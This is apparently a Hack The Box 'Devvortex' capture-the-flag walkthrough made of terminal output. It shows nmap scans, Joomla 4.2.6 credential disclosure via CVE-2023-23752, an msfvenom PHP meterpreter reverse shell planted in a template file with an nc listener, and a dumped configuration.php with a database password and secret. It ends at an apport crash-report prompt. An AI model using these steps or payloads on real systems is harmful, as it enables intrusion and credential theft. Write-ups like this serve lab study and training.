┌──(kali㉿kali)-[~/htb/devvortex] └─$ sudo nmap -sS -oA nmap/initial_scan 10.129.240.236 [sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 11:21 EST Nmap scan report for 10.129.240.236 Host is up (0.14s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds ┌──(kali㉿kali)-[~/htb/devvortex] └─$ sudo nmap -sC -sV -p 22,80 10.129.240.236 Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 11:29 EST Nmap scan report for 10.129.240.236 Host is up (0.14s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://devvortex.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds
Foothold
Added vhost to hosts file
1 2 3
┌──(kali㉿kali)-[~/htb/devvortex] └─$ echo '10.129.240.236 devvortex.htb' | sudo tee -a /etc/hosts 10.129.240.236 devvortex.htb
# If the Joomla site is installed within a folder # eg www.example.com/joomla/ then the robots.txt file # MUST be moved to the site root # eg www.example.com/robots.txt # AND the joomla folder name MUST be prefixed to all of the # paths. # eg the Disallow rule for the /administrator/ folder MUST # be changed to read # Disallow: /joomla/administrator/ # # For more information about the robots.txt standard, see: # https://www.robotstxt.org/orig.html
http://dev.devvortex.htb/administrator/ is a Joomla admin login page
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml exposes version of Joomla
1 2 3 4 5 6 7 8 9 10 11
<extension type="file" method="upgrade"> <name>files_joomla</name> <author>Joomla! Project</author> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <copyright>(C) 2019 Open Source Matters, Inc.</copyright> <license> GNU General Public License version 2 or later; see LICENSE.txt </license> <version>4.2.6</version> ----------------------SNIPPED----------------------------
Joomla 4.2.6 is vulnerable to an authentication bypass which results in information leak (CVE-2023-23752), which if I go to http://dev.devvortex.htb/api/index.php/v1/config/application?public=true, it will reveal the login credentials
┌──(kali㉿kali)-[~/htb/devvortex/files] └─$ msfvenom -p php/meterpreter LHOST=10.10.14.107 LPORT=1234 -o shell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 2997 bytes Saved as: shell.php
Heading to Sytem > Site Templates > Cassiopeeia Details and Files Opened error.php, and replaced the contents of the whole file with what’s in shell.php
Listen on port 1234
1 2 3
┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 listening on [any] 1234 ..
cat configuration.php <?php class JConfig { public $offline = false; public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.'; public $display_offline_message = 1; public $offline_image = ''; public $sitename = 'Development'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = 20; public $access = 1; public $debug = false; public $debug_lang = false; public $debug_lang_const = true; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'lewis'; public $password = 'P4ntherg0t1n5r3c0n##'; public $db = 'joomla'; public $dbprefix = 'sd4fg_'; public $dbencryption = 0; public $dbsslverifyservercert = false; public $dbsslkey = ''; public $dbsslcert = ''; public $dbsslca = ''; public $dbsslcipher = ''; public $force_ssl = 0; public $live_site = ''; public $secret = 'ZI7zLTbaGKliS9gq'; public $gzip = false; public $error_reporting = 'default'; public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}'; public $offset = 'UTC'; public $mailonline = true; public $mailer = 'mail'; public $mailfrom = 'lewis@devvortex.htb'; public $fromname = 'Development'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = false; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = 25; public $caching = 0; public $cache_handler = 'file'; public $cachetime = 15; public $cache_platformprefix = false; public $MetaDesc = ''; public $MetaAuthor = true; public $MetaVersion = false; public $robots = ''; public $sef = true; public $sef_rewrite = false; public $sef_suffix = false; public $unicodeslugs = false; public $feed_limit = 10; public $feed_email = 'none'; public $log_path = '/var/www/dev.devvortex.htb/administrator/logs'; public $tmp_path = '/var/www/dev.devvortex.htb/tmp'; public $lifetime = 15; public $session_handler = 'database'; public $shared_session = false; public $session_metadata = true; }
The collected information can be sent to the developers to improve the application. This might take a few minutes. ..................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the automatically opened web browser.
What would you like to do? Your options are: S: Send report (3.6 KB) V: View report K: Keep report file for sending later or copying to somewhere else I: Cancel and ignore future crashes of this program version C: Cancel Please choose (S/V/K/I/C): v